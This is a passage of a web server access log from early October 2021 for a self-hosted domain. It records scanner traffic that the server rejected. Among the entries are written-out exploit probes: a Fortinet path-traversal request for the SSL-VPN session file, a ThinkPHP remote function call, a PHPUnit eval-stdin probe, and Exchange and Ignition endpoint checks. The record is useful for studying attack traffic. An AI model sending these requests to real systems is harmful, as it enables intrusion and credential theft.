+0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [01/Oct/2021:08:24:56 +0000] 400 - GET http 5.188.210.227 "/echo.php" [Client 5.188.210.227] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "https://www.google.com/" [01/Oct/2021:09:40:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.209.206] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Oct/2021:09:54:33 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 162.62.117.51] [Length 0] [Gzip -] "-" "-" [01/Oct/2021:10:05:33 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:10:05:34 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:10:38:43 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [01/Oct/2021:11:11:49 +0000] 400 - - http localhost "-" [Client 185.202.1.84] [Length 154] [Gzip -] "-" "-" [01/Oct/2021:11:11:49 +0000] 400 - - http localhost "-" [Client 185.202.1.84] [Length 154] [Gzip -] "-" "-" [01/Oct/2021:12:40:00 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.202.176] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Oct/2021:13:36:43 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [01/Oct/2021:13:38:00 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Oct/2021:13:38:01 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Oct/2021:13:38:02 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Oct/2021:13:38:02 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Oct/2021:13:38:04 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Oct/2021:13:38:04 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [01/Oct/2021:13:38:07 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Oct/2021:13:38:07 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Oct/2021:13:38:08 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Oct/2021:13:38:09 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Oct/2021:13:38:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Oct/2021:13:38:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [01/Oct/2021:13:49:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Oct/2021:15:23:23 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 34.86.35.18] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [01/Oct/2021:15:24:12 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [01/Oct/2021:16:03:26 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:16:03:27 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:16:56:49 +0000] 400 - GET http localhost "/ab2g" [Client 68.183.28.147] [Length 154] [Gzip -] "-" "-" [01/Oct/2021:16:56:49 +0000] 400 - GET http localhost "/ab2h" [Client 68.183.28.147] [Length 154] [Gzip -] "-" "-" [01/Oct/2021:16:56:53 +0000] 400 - - http localhost "-" [Client 68.183.28.147] [Length 154] [Gzip -] "-" "-" [01/Oct/2021:16:59:31 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 212.102.34.242] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36" "-" [01/Oct/2021:17:16:59 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:17:16:59 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:18:29:41 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:18:29:41 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:18:46:08 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [01/Oct/2021:19:29:40 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:19:29:40 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:19:45:44 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:19:45:45 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:20:32:53 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:20:32:54 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:20:44:10 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Oct/2021:20:44:10 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Oct/2021:20:44:10 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Oct/2021:20:44:10 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Oct/2021:20:44:10 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Oct/2021:20:44:10 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [01/Oct/2021:20:45:55 +0000] 444 - GET https getsimnum.moralanimal.net "/" [Client 124.126.78.189] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; HUAWEI P20 Build/816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4472.114 Mobile Safari/537.36" "-" [01/Oct/2021:21:03:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Oct/2021:22:02:04 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 92.118.160.1] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [01/Oct/2021:22:27:33 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [01/Oct/2021:23:36:26 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 34.86.35.12] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [01/Oct/2021:23:47:52 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Oct/2021:23:47:52 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Oct/2021:00:00:02 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.210.88] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Oct/2021:00:27:08 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 198.199.111.94] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Oct/2021:00:28:20 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.200.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Oct/2021:00:29:38 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.205.35] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Oct/2021:00:47:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.212] [Length 0] [Gzip -] "-" "-" [02/Oct/2021:01:21:56 +0000] 400 - GET http localhost "/" [Client 47.118.23.63] [Length 154] [Gzip -] "-" "-" [02/Oct/2021:02:19:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.209.125.16] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [02/Oct/2021:02:47:43 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 54.149.165.124] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [02/Oct/2021:03:07:07 +0000] 444 - GET https pop.moralanimal.net "/" [Client 34.77.162.14] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [02/Oct/2021:03:17:51 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 34.86.35.5] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [02/Oct/2021:03:20:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Oct/2021:03:44:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 180.149.125.175] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [02/Oct/2021:04:01:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.59.1] [Length 0] [Gzip -] "HTTP Banner Detection (https://security.ipip.net)" "-" [02/Oct/2021:04:15:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Oct/2021:04:26:13 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Oct/2021:04:26:15 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Oct/2021:04:26:16 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [02/Oct/2021:04:26:18 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Oct/2021:04:26:23 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Oct/2021:04:26:24 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Oct/2021:04:26:26 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Oct/2021:04:26:27 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Oct/2021:04:26:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Oct/2021:05:25:48 +0000] 400 - GET http localhost "/" [Client 222.175.199.226] [Length 154] [Gzip -] "-" "-" [02/Oct/2021:05:51:28 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.203.85] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Oct/2021:06:39:44 +0000] 444 - GET https 64.22.31.253 "/recordings/theme/main.css" [Client 23.148.145.239] [Length 0] [Gzip -] "curl/7.29.0" "-" [02/Oct/2021:08:35:47 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 5.188.86.100] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "-" [02/Oct/2021:09:12:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.220] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [02/Oct/2021:09:12:06 +0000] 400 - - https localhost "-" [Client 185.83.214.69] [Length 154] [Gzip -] "-" "-" [02/Oct/2021:09:12:09 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.165] [Length 0] [Gzip -] "-" "-" [02/Oct/2021:09:12:10 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.165] [Length 0] [Gzip -] "-" "-" [02/Oct/2021:09:12:16 +0000] 400 - - https localhost "-" [Client 23.129.64.165] [Length 154] [Gzip -] "-" "-" [02/Oct/2021:09:18:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Oct/2021:09:20:20 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 92.118.160.41] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [02/Oct/2021:09:43:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.209.16] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Oct/2021:10:07:24 +0000] 444 - HEAD https 64.22.31.253 "/epa/scripts/win/nsepa_setup.exe" [Client 18.144.147.75] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [02/Oct/2021:10:08:30 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [02/Oct/2021:10:31:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.62.117.51] [Length 0] [Gzip -] "-" "-" [02/Oct/2021:10:44:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Oct/2021:12:28:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.41] [Length 0] [Gzip -] "-" "-" [02/Oct/2021:12:28:19 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.41] [Length 252] [Gzip -] "-" "-" [02/Oct/2021:12:28:19 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.41] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [02/Oct/2021:12:42:36 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.201.66] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Oct/2021:12:45:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [02/Oct/2021:12:45:37 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211002204434" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [02/Oct/2021:14:11:55 +0000] 444 - GET https sql.moralanimal.net "/" [Client 124.126.78.189] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; OPPO x22 6.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4472.114 Mobile Safari/537.36" "-" [02/Oct/2021:14:59:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 88.9.119.217] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Oct/2021:16:44:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Oct/2021:17:02:40 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Oct/2021:17:02:40 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Oct/2021:17:02:40 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Oct/2021:17:02:40 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Oct/2021:17:02:40 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Oct/2021:17:02:40 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [02/Oct/2021:21:05:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 182.161.66.103] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36" "-" [02/Oct/2021:21:25:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.116] [Length 0] [Gzip -] "-" "-" [02/Oct/2021:21:26:00 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.116] [Length 252] [Gzip -] "-" "-" [02/Oct/2021:21:26:00 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.116] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [02/Oct/2021:22:16:04 +0000] 444 - GET https 139.162.113.11 "/" [Client 103.109.37.114] [Length 0] [Gzip -] "python-requests/2.21.0" "-" [02/Oct/2021:23:11:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Oct/2021:23:54:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 20.55.75.76] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [02/Oct/2021:23:54:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 20.55.75.76] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [02/Oct/2021:23:54:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 20.55.75.76] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [02/Oct/2021:23:54:00 +0000] 400 - GET http 64.22.31.253 "/" [Client 20.55.75.76] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [02/Oct/2021:23:54:00 +0000] 400 - GET http 64.22.31.253 "/" [Client 20.55.75.76] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [02/Oct/2021:23:54:01 +0000] 400 - GET http 64.22.31.253 "/" [Client 20.55.75.76] [Length 252] [Gzip -] 